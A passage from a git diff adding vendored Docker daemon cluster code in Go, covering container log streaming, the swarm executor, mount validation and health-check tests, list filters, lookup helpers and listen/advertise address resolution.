logs") + } + + rc, err := r.adapter.logs(ctx, options) + if err != nil { + return errors.Wrap(err, "failed getting container logs") + } + defer rc.Close() + + var ( + // use a rate limiter to keep things under control but also provides some + // ability coalesce messages. + limiter = rate.NewLimiter(rate.Every(time.Second), 10<<20) // 10 MB/s + msgctx = api.LogContext{ + NodeID: r.task.NodeID, + ServiceID: r.task.ServiceID, + TaskID: r.task.ID, + } + ) + + brd := bufio.NewReader(rc) + for { + // so, message header is 8 bytes, treat as uint64, pull stream off MSB + var header uint64 + if err := binary.Read(brd, binary.BigEndian, &header); err != nil { + if err == io.EOF { + return nil + } + + return errors.Wrap(err, "failed reading log header") + } + + stream, size := (header>>(7<<3))&0xFF, header & ^(uint64(0xFF)<<(7<<3)) + + // limit here to decrease allocation back pressure. + if err := limiter.WaitN(ctx, int(size)); err != nil { + return errors.Wrap(err, "failed rate limiter") + } + + buf := make([]byte, size) + _, err := io.ReadFull(brd, buf) + if err != nil { + return errors.Wrap(err, "failed reading buffer") + } + + // Timestamp is RFC3339Nano with 1 space after. Lop, parse, publish + parts := bytes.SplitN(buf, []byte(" "), 2) + if len(parts) != 2 { + return fmt.Errorf("invalid timestamp in log message: %v", buf) + } + + ts, err := time.Parse(time.RFC3339Nano, string(parts[0])) + if err != nil { + return errors.Wrap(err, "failed to parse timestamp") + } + + tsp, err := ptypes.TimestampProto(ts) + if err != nil { + return errors.Wrap(err, "failed to convert timestamp") + } + + if err := publisher.Publish(ctx, api.LogMessage{ + Context: msgctx, + Timestamp: tsp, + Stream: api.LogStream(stream), + + Data: parts[1], + }); err != nil { + return errors.Wrap(err, "failed to publish log message") + } + } +} + +// Close the runner and clean up any ephemeral resources. +func (r *controller) Close() error { + select { + case <-r.closed: + return r.err + default: + if r.cancelPull != nil { + r.cancelPull() + } + + r.err = exec.ErrControllerClosed + close(r.closed) + } + return nil +} + +func (r *controller) matchevent(event events.Message) bool { + if event.Type != events.ContainerEventType { + return false + } + + // TODO(stevvooe): Filter based on ID matching, in addition to name. + + // Make sure the events are for this container. + if event.Actor.Attributes["name"] != r.adapter.container.name() { + return false + } + + return true +} + +func (r *controller) checkClosed() error { + select { + case <-r.closed: + return r.err + default: + return nil + } +} + +func parseContainerStatus(ctnr types.ContainerJSON) (*api.ContainerStatus, error) { + status := &api.ContainerStatus{ + ContainerID: ctnr.ID, + PID: int32(ctnr.State.Pid), + ExitCode: int32(ctnr.State.ExitCode), + } + + return status, nil +} + +func parsePortStatus(ctnr types.ContainerJSON) (*api.PortStatus, error) { + status := &api.PortStatus{} + + if ctnr.NetworkSettings != nil && len(ctnr.NetworkSettings.Ports) > 0 { + exposedPorts, err := parsePortMap(ctnr.NetworkSettings.Ports) + if err != nil { + return nil, err + } + status.Ports = exposedPorts + } + + return status, nil +} + +func parsePortMap(portMap nat.PortMap) ([]*api.PortConfig, error) { + exposedPorts := make([]*api.PortConfig, 0, len(portMap)) + + for portProtocol, mapping := range portMap { + parts := strings.SplitN(string(portProtocol), "/", 2) + if len(parts) != 2 { + return nil, fmt.Errorf("invalid port mapping: %s", portProtocol) + } + + port, err := strconv.ParseUint(parts[0], 10, 16) + if err != nil { + return nil, err + } + + protocol := api.ProtocolTCP + switch strings.ToLower(parts[1]) { + case "tcp": + protocol = api.ProtocolTCP + case "udp": + protocol = api.ProtocolUDP + default: + return nil, fmt.Errorf("invalid protocol: %s", parts[1]) + } + + for _, binding := range mapping { + hostPort, err := strconv.ParseUint(binding.HostPort, 10, 16) + if err != nil { + return nil, err + } + + // TODO(aluzzardi): We're losing the port `name` here since + // there's no way to retrieve it back from the Engine. + exposedPorts = append(exposedPorts, &api.PortConfig{ + PublishMode: api.PublishModeHost, + Protocol: protocol, + TargetPort: uint32(port), + PublishedPort: uint32(hostPort), + }) + } + } + + return exposedPorts, nil +} + +type exitError struct { + code int + cause error +} + +func (e *exitError) Error() string { + if e.cause != nil { + return fmt.Sprintf("task: non-zero exit (%v): %v", e.code, e.cause) + } + + return fmt.Sprintf("task: non-zero exit (%v)", e.code) +} + +func (e *exitError) ExitCode() int { + return int(e.code) +} + +func (e *exitError) Cause() error { + return e.cause +} + +// checkHealth blocks until unhealthy container is detected or ctx exits +func (r *controller) checkHealth(ctx context.Context) error { + eventq := r.adapter.events(ctx) + + for { + select { + case <-ctx.Done(): + return nil + case <-r.closed: + return nil + case event := <-eventq: + if !r.matchevent(event) { + continue + } + + switch event.Action { + case "health_status: unhealthy": + return ErrContainerUnhealthy + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go new file mode 100644 index 0000000000..63e1233566 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go @@ -0,0 +1,15 @@ +package container + +import "fmt" + +var ( + // ErrImageRequired returned if a task is missing the image definition. + ErrImageRequired = fmt.Errorf("dockerexec: image required") + + // ErrContainerDestroyed returned when a container is prematurely destroyed + // during a wait call. + ErrContainerDestroyed = fmt.Errorf("dockerexec: container destroyed") + + // ErrContainerUnhealthy returned if controller detects the health check failure + ErrContainerUnhealthy = fmt.Errorf("dockerexec: unhealthy container") +) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go new file mode 100644 index 0000000000..f0dedd4530 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go @@ -0,0 +1,194 @@ +package container + +import ( + "sort" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + networktypes "github.com/docker/libnetwork/types" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/agent/secrets" + "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +type executor struct { + backend executorpkg.Backend + secrets exec.SecretsManager +} + +// NewExecutor returns an executor from the docker client. +func NewExecutor(b executorpkg.Backend) exec.Executor { + return &executor{ + backend: b, + secrets: secrets.NewManager(), + } +} + +// Describe returns the underlying node description from the docker client. +func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { + info, err := e.backend.SystemInfo() + if err != nil { + return nil, err + } + + plugins := map[api.PluginDescription]struct{}{} + addPlugins := func(typ string, names []string) { + for _, name := range names { + plugins[api.PluginDescription{ + Type: typ, + Name: name, + }] = struct{}{} + } + } + + // add v1 plugins + addPlugins("Volume", info.Plugins.Volume) + // Add builtin driver "overlay" (the only builtin multi-host driver) to + // the plugin list by default. + addPlugins("Network", append([]string{"overlay"}, info.Plugins.Network...)) + addPlugins("Authorization", info.Plugins.Authorization) + + // add v2 plugins + v2Plugins, err := e.backend.PluginManager().List() + if err == nil { + for _, plgn := range v2Plugins { + for _, typ := range plgn.Config.Interface.Types { + if typ.Prefix != "docker" || !plgn.Enabled { + continue + } + plgnTyp := typ.Capability + if typ.Capability == "volumedriver" { + plgnTyp = "Volume" + } else if typ.Capability == "networkdriver" { + plgnTyp = "Network" + } + plugins[api.PluginDescription{ + Type: plgnTyp, + Name: plgn.Name, + }] = struct{}{} + } + } + } + + pluginFields := make([]api.PluginDescription, 0, len(plugins)) + for k := range plugins { + pluginFields = append(pluginFields, k) + } + + sort.Sort(sortedPlugins(pluginFields)) + + // parse []string labels into a map[string]string + labels := map[string]string{} + for _, l := range info.Labels { + stringSlice := strings.SplitN(l, "=", 2) + // this will take the last value in the list for a given key + // ideally, one shouldn't assign multiple values to the same key + if len(stringSlice) > 1 { + labels[stringSlice[0]] = stringSlice[1] + } + } + + description := &api.NodeDescription{ + Hostname: info.Name, + Platform: &api.Platform{ + Architecture: info.Architecture, + OS: info.OSType, + }, + Engine: &api.EngineDescription{ + EngineVersion: info.ServerVersion, + Labels: labels, + Plugins: pluginFields, + }, + Resources: &api.Resources{ + NanoCPUs: int64(info.NCPU) * 1e9, + MemoryBytes: info.MemTotal, + }, + } + + return description, nil +} + +func (e *executor) Configure(ctx context.Context, node *api.Node) error { + na := node.Attachment + if na == nil { + return nil + } + + options := types.NetworkCreate{ + Driver: na.Network.DriverState.Name, + IPAM: &network.IPAM{ + Driver: na.Network.IPAM.Driver.Name, + }, + Options: na.Network.DriverState.Options, + CheckDuplicate: true, + } + + for _, ic := range na.Network.IPAM.Configs { + c := network.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + } + options.IPAM.Config = append(options.IPAM.Config, c) + } + + return e.backend.SetupIngress(clustertypes.NetworkCreateRequest{ + na.Network.ID, + types.NetworkCreateRequest{ + Name: na.Network.Spec.Annotations.Name, + NetworkCreate: options, + }, + }, na.Addresses[0]) +} + +// Controller returns a docker container runner. +func (e *executor) Controller(t *api.Task) (exec.Controller, error) { + if t.Spec.GetAttachment() != nil { + return newNetworkAttacherController(e.backend, t, e.secrets) + } + + ctlr, err := newController(e.backend, t, e.secrets) + if err != nil { + return nil, err + } + + return ctlr, nil +} + +func (e *executor) SetNetworkBootstrapKeys(keys []*api.EncryptionKey) error { + nwKeys := []*networktypes.EncryptionKey{} + for _, key := range keys { + nwKey := &networktypes.EncryptionKey{ + Subsystem: key.Subsystem, + Algorithm: int32(key.Algorithm), + Key: make([]byte, len(key.Key)), + LamportTime: key.LamportTime, + } + copy(nwKey.Key, key.Key) + nwKeys = append(nwKeys, nwKey) + } + e.backend.SetNetworkBootstrapKeys(nwKeys) + + return nil +} + +func (e *executor) Secrets() exec.SecretsManager { + return e.secrets +} + +type sortedPlugins []api.PluginDescription + +func (sp sortedPlugins) Len() int { return len(sp) } + +func (sp sortedPlugins) Swap(i, j int) { sp[i], sp[j] = sp[j], sp[i] } + +func (sp sortedPlugins) Less(i, j int) bool { + if sp[i].Type != sp[j].Type { + return sp[i].Type < sp[j].Type + } + return sp[i].Name < sp[j].Name +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go new file mode 100644 index 0000000000..99cf7502af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go @@ -0,0 +1,102 @@ +// +build !windows + +package container + +import ( + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon" + "github.com/docker/docker/daemon/events" + "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +func TestHealthStates(t *testing.T) { + + // set up environment: events, task, container .... + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + task := &api.Task{ + ID: "id", + ServiceID: "sid", + Spec: api.TaskSpec{ + Runtime: &api.TaskSpec_Container{ + Container: &api.ContainerSpec{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", + }, + }, + }, + }, + Annotations: api.Annotations{Name: "name"}, + } + + c := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "id", + Name: "name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", + }, + }, + }, + } + + daemon := &daemon.Daemon{ + EventsService: e, + } + + controller, err := newController(daemon, task, nil) + if err != nil { + t.Fatalf("create controller fail %v", err) + } + + errChan := make(chan error, 1) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + // fire checkHealth + go func() { + err := controller.checkHealth(ctx) + select { + case errChan <- err: + case <-ctx.Done(): + } + }() + + // send an event and expect to get expectedErr + // if expectedErr is nil, shouldn't get any error + logAndExpect := func(msg string, expectedErr error) { + daemon.LogContainerEvent(c, msg) + + timer := time.NewTimer(1 * time.Second) + defer timer.Stop() + + select { + case err := <-errChan: + if err != expectedErr { + t.Fatalf("expect error %v, but get %v", expectedErr, err) + } + case <-timer.C: + if expectedErr != nil { + t.Fatalf("time limit exceeded, didn't get expected error") + } + } + } + + // events that are ignored by checkHealth + logAndExpect("health_status: running", nil) + logAndExpect("health_status: healthy", nil) + logAndExpect("die", nil) + + // unhealthy event will be caught by checkHealth + logAndExpect("health_status: unhealthy", ErrContainerUnhealthy) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go new file mode 100644 index 0000000000..5fda1f2edb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go @@ -0,0 +1,39 @@ +package container + +import ( + "fmt" + "path/filepath" + + "github.com/docker/swarmkit/api" +) + +func validateMounts(mounts []api.Mount) error { + for _, mount := range mounts { + // Target must always be absolute + if !filepath.IsAbs(mount.Target) { + return fmt.Errorf("invalid mount target, must be an absolute path: %s", mount.Target) + } + + switch mount.Type { + // The checks on abs paths are required due to the container API confusing + // volume mounts as bind mounts when the source is absolute (and vice-versa) + // See #25253 + // TODO: This is probably not necessary once #22373 is merged + case api.MountTypeBind: + if !filepath.IsAbs(mount.Source) { + return fmt.Errorf("invalid bind mount source, must be an absolute path: %s", mount.Source) + } + case api.MountTypeVolume: + if filepath.IsAbs(mount.Source) { + return fmt.Errorf("invalid volume mount source, must not be an absolute path: %s", mount.Source) + } + case api.MountTypeTmpfs: + if mount.Source != "" { + return fmt.Errorf("invalid tmpfs source, source must be empty") + } + default: + return fmt.Errorf("invalid mount type: %s", mount.Type) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go new file mode 100644 index 0000000000..9d98e2c008 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go @@ -0,0 +1,141 @@ +package container + +import ( + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/daemon" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/swarmkit/api" +) + +func newTestControllerWithMount(m api.Mount) (*controller, error) { + return newController(&daemon.Daemon{}, &api.Task{ + ID: stringid.GenerateRandomID(), + ServiceID: stringid.GenerateRandomID(), + Spec: api.TaskSpec{ + Runtime: &api.TaskSpec_Container{ + Container: &api.ContainerSpec{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", + }, + Mounts: []api.Mount{m}, + }, + }, + }, + }, nil) +} + +func TestControllerValidateMountBind(t *testing.T) { + // with improper source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: "foo", + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid bind mount source") { + t.Fatalf("expected error, got: %v", err) + } + + // with non-existing source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: testAbsNonExistent, + Target: testAbsPath, + }); err != nil { + t.Fatalf("controller should not error at creation: %v", err) + } + + // with proper source + tmpdir, err := ioutil.TempDir("", "TestControllerValidateMountBind") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.Remove(tmpdir) + + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: tmpdir, + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected error, got: %v", err) + } +} + +func TestControllerValidateMountVolume(t *testing.T) { + // with improper source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeVolume, + Source: testAbsPath, + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid volume mount source") { + t.Fatalf("expected error, got: %v", err) + } + + // with proper source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeVolume, + Source: "foo", + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected error, got: %v", err) + } +} + +func TestControllerValidateMountTarget(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestControllerValidateMountTarget") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.Remove(tmpdir) + + // with improper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: testAbsPath, + Target: "foo", + }); err == nil || !strings.Contains(err.Error(), "invalid mount target") { + t.Fatalf("expected error, got: %v", err) + } + + // with proper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: tmpdir, + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected no error, got: %v", err) + } +} + +func TestControllerValidateMountTmpfs(t *testing.T) { + // with improper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeTmpfs, + Source: "foo", + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid tmpfs source") { + t.Fatalf("expected error, got: %v", err) + } + + // with proper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeTmpfs, + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected no error, got: %v", err) + } +} + +func TestControllerValidateMountInvalidType(t *testing.T) { + // with improper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.Mount_MountType(9999), + Source: "foo", + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid mount type") { + t.Fatalf("expected error, got: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go new file mode 100644 index 0000000000..c616eeef93 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go @@ -0,0 +1,8 @@ +// +build !windows + +package container + +const ( + testAbsPath = "/foo" + testAbsNonExistent = "/some-non-existing-host-path/" +) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go new file mode 100644 index 0000000000..c346451d3d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go @@ -0,0 +1,8 @@ +// +build windows + +package container + +const ( + testAbsPath = `c:\foo` + testAbsNonExistent = `c:\some-non-existing-host-path\` +) diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters.go b/vendor/github.com/docker/docker/daemon/cluster/filters.go new file mode 100644 index 0000000000..88668edaac --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/filters.go @@ -0,0 +1,116 @@ +package cluster + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/filters" + runconfigopts "github.com/docker/docker/runconfig/opts" + swarmapi "github.com/docker/swarmkit/api" +) + +func newListNodesFilters(filter filters.Args) (*swarmapi.ListNodesRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + "role": true, + "membership": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + f := &swarmapi.ListNodesRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + } + + for _, r := range filter.Get("role") { + if role, ok := swarmapi.NodeRole_value[strings.ToUpper(r)]; ok { + f.Roles = append(f.Roles, swarmapi.NodeRole(role)) + } else if r != "" { + return nil, fmt.Errorf("Invalid role filter: '%s'", r) + } + } + + for _, a := range filter.Get("membership") { + if membership, ok := swarmapi.NodeSpec_Membership_value[strings.ToUpper(a)]; ok { + f.Memberships = append(f.Memberships, swarmapi.NodeSpec_Membership(membership)) + } else if a != "" { + return nil, fmt.Errorf("Invalid membership filter: '%s'", a) + } + } + + return f, nil +} + +func newListServicesFilters(filter filters.Args) (*swarmapi.ListServicesRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + return &swarmapi.ListServicesRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + }, nil +} + +func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) error) (*swarmapi.ListTasksRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + "service": true, + "node": true, + "desired-state": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + if transformFunc != nil { + if err := transformFunc(filter); err != nil { + return nil, err + } + } + f := &swarmapi.ListTasksRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + ServiceIDs: filter.Get("service"), + NodeIDs: filter.Get("node"), + } + + for _, s := range filter.Get("desired-state") { + if state, ok := swarmapi.TaskState_value[strings.ToUpper(s)]; ok { + f.DesiredStates = append(f.DesiredStates, swarmapi.TaskState(state)) + } else if s != "" { + return nil, fmt.Errorf("Invalid desired-state filter: '%s'", s) + } + } + + return f, nil +} + +func newListSecretsFilters(filter filters.Args) (*swarmapi.ListSecretsRequest_Filters, error) { + accepted := map[string]bool{ + "names": true, + "name": true, + "id": true, + "label": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + return &swarmapi.ListSecretsRequest_Filters{ + Names: filter.Get("names"), + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/helpers.go b/vendor/github.com/docker/docker/daemon/cluster/helpers.go new file mode 100644 index 0000000000..be5bf56e87 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/helpers.go @@ -0,0 +1,108 @@ +package cluster + +import ( + "fmt" + + swarmapi "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, error) { + rl, err := c.ListClusters(ctx, &swarmapi.ListClustersRequest{}) + if err != nil { + return nil, err + } + + if len(rl.Clusters) == 0 { + return nil, fmt.Errorf("swarm not found") + } + + // TODO: assume one cluster only + return rl.Clusters[0], nil +} + +func getNode(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Node, error) { + // GetNode to match via full ID. + rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}) + if err != nil { + // If any error (including NotFound), ListNodes to match via full name. + rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{Names: []string{input}}}) + + if err != nil || len(rl.Nodes) == 0 { + // If any error or 0 result, ListNodes to match via ID prefix. + rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Nodes) == 0 { + return nil, fmt.Errorf("node %s not found", input) + } + + if l := len(rl.Nodes); l > 1 { + return nil, fmt.Errorf("node %s is ambiguous (%d matches found)", input, l) + } + + return rl.Nodes[0], nil + } + return rg.Node, nil +} + +func getService(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Service, error) { + // GetService to match via full ID. + rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input}) + if err != nil { + // If any error (including NotFound), ListServices to match via full name. + rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{Names: []string{input}}}) + if err != nil || len(rl.Services) == 0 { + // If any error or 0 result, ListServices to match via ID prefix. + rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Services) == 0 { + return nil, fmt.Errorf("service %s not found", input) + } + + if l := len(rl.Services); l > 1 { + return nil, fmt.Errorf("service %s is ambiguous (%d matches found)", input, l) + } + + return rl.Services[0], nil + } + return rg.Service, nil +} + +func getTask(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Task, error) { + // GetTask to match via full ID. + rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}) + if err != nil { + // If any error (including NotFound), ListTasks to match via full name. + rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{Names: []string{input}}}) + + if err != nil || len(rl.Tasks) == 0 { + // If any error or 0 result, ListTasks to match via ID prefix. + rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Tasks) == 0 { + return nil, fmt.Errorf("task %s not found", input) + } + + if l := len(rl.Tasks); l > 1 { + return nil, fmt.Errorf("task %s is ambiguous (%d matches found)", input, l) + } + + return rl.Tasks[0], nil + } + return rg.Task, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go new file mode 100644 index 0000000000..c24d4865b3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go @@ -0,0 +1,278 @@ +package cluster + +import ( + "errors" + "fmt" + "net" +) + +var ( + errNoSuchInterface = errors.New("no such interface") + errNoIP = errors.New("could not find the system's IP address") + errMustSpecifyListenAddr = errors.New("must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified") + errBadListenAddr = errors.New("listen address must be an IP address or network interface (with optional port number)") + errBadAdvertiseAddr = errors.New("advertise address must be a non-zero IP address or network interface (with optional port number)") + errBadDefaultAdvertiseAddr = errors.New("default advertise address must be a non-zero IP address or network interface (without a port number)") +) + +func resolveListenAddr(specifiedAddr string) (string, string, error) { + specifiedHost, specifiedPort, err := net.SplitHostPort(specifiedAddr) + if err != nil { + return "", "", fmt.Errorf("could not parse listen address %s", specifiedAddr) + } + + // Does the host component match any of the interface names on the + // system? If so, use the address from that interface. + interfaceAddr, err := resolveInterfaceAddr(specifiedHost) + if err == nil { + return interfaceAddr.String(), specifiedPort, nil + } + if err != errNoSuchInterface { + return "", "", err + } + + // If it's not an interface, it must be an IP (for now) + if net.ParseIP(specifiedHost) == nil { + return "", "", errBadListenAddr + } + + return specifiedHost, specifiedPort, nil +} + +func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (string, string, error) { + // Approach: + // - If an advertise address is specified, use that. Resolve the + // interface's address if an interface was specified in + // advertiseAddr. Fill in the port from listenAddrPort if necessary. + // - If DefaultAdvertiseAddr is not empty, use that with the port from + // listenAddrPort. Resolve the interface's address from + // if an interface name was specified in DefaultAdvertiseAddr. + // - Otherwise, try to autodetect the system's address. Use the port in + // listenAddrPort with this address if autodetection succeeds. + + if advertiseAddr != "" { + advertiseHost, advertisePort, err := net.SplitHostPort(advertiseAddr) + if err != nil { + // Not a host:port specification + advertiseHost = advertiseAddr + advertisePort = listenAddrPort + } + + // Does the host component match any of the interface names on the + // system? If so, use the address from that interface. + interfaceAddr, err := resolveInterfaceAddr(advertiseHost) + if err == nil { + return interfaceAddr.String(), advertisePort, nil + } + if err != errNoSuchInterface { + return "", "", err + } + + // If it's not an interface, it must be an IP (for now) + if ip := net.ParseIP(advertiseHost); ip == nil || ip.IsUnspecified() { + return "", "", errBadAdvertiseAddr + } + + return advertiseHost, advertisePort, nil + } + + if c.config.DefaultAdvertiseAddr != "" { + // Does the default advertise address component match any of the + // interface names on the system? If so, use the address from + // that interface. + interfaceAddr, err := resolveInterfaceAddr(c.config.DefaultAdvertiseAddr) + if err == nil { + return interfaceAddr.String(), listenAddrPort, nil + } + if err != errNoSuchInterface { + return "", "", err + } + + // If it's not an interface, it must be an IP (for now) + if ip := net.ParseIP(c.config.DefaultAdvertiseAddr); ip == nil || ip.IsUnspecified() { + return "", "", errBadDefaultAdvertiseAddr + } + + return c.config.DefaultAdvertiseAddr, listenAddrPort, nil + } + + systemAddr, err := c.resolveSystemAddr() + if err != nil { + return "", "", err + } + return systemAddr.String(), listenAddrPort, nil +} + +func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { + // Use a specific interface's IP address. + intf, err := net.InterfaceByName(specifiedInterface) + if err != nil { + return nil, errNoSuchInterface + } + + addrs, err := intf.Addrs() + if err != nil { + return nil, err + } + + var interfaceAddr4, interfaceAddr6 net.IP + + for _, addr := range addrs { + ipAddr, ok := addr.(*net.IPNet) + + if ok { + if ipAddr.IP.To4() != nil { + // IPv4 + if interfaceAddr4 != nil { + return nil, fmt.Errorf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP) + } + interfaceAddr4 = ipAddr.IP + } else { + // IPv6 + if interfaceAddr6 != nil { + return nil, fmt.Errorf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP) + } + interfaceAddr6 = ipAddr.IP + } + } + } + + if interfaceAddr4 == nil && interfaceAddr6 == nil { + return nil, fmt.Errorf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface) + } + + // In the case that there's exactly one IPv4 address + // and exactly one IPv6 address, favor IPv4 over IPv6. + if interfaceAddr4 != nil { + return interfaceAddr4, nil + } + return interfaceAddr6, nil +} + +func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) { + // Use the system's only IP address, or fail if there are + // multiple addresses to choose from. Skip interfaces which + // are managed by docker via subnet check. + interfaces, err := net.Interfaces() + if err != nil { + return nil, err + } + + var systemAddr net.IP + var systemInterface string + + // List Docker-managed subnets + v4Subnets := c.config.NetworkSubnetsProvider.V4Subnets() + v6Subnets := c.config.NetworkSubnetsProvider.V6Subnets() + +ifaceLoop: + for _, intf := range interfaces { + // Skip inactive interfaces and loopback interfaces + if (intf.Flags&net.FlagUp == 0) || (intf.Flags&net.FlagLoopback) != 0 { + continue + } + + addrs, err := intf.Addrs() + if err != nil { + continue + } + + var interfaceAddr4, interfaceAddr6 net.IP + + for _, addr := range addrs { + ipAddr, ok := addr.(*net.IPNet) + + // Skip loopback and link-local 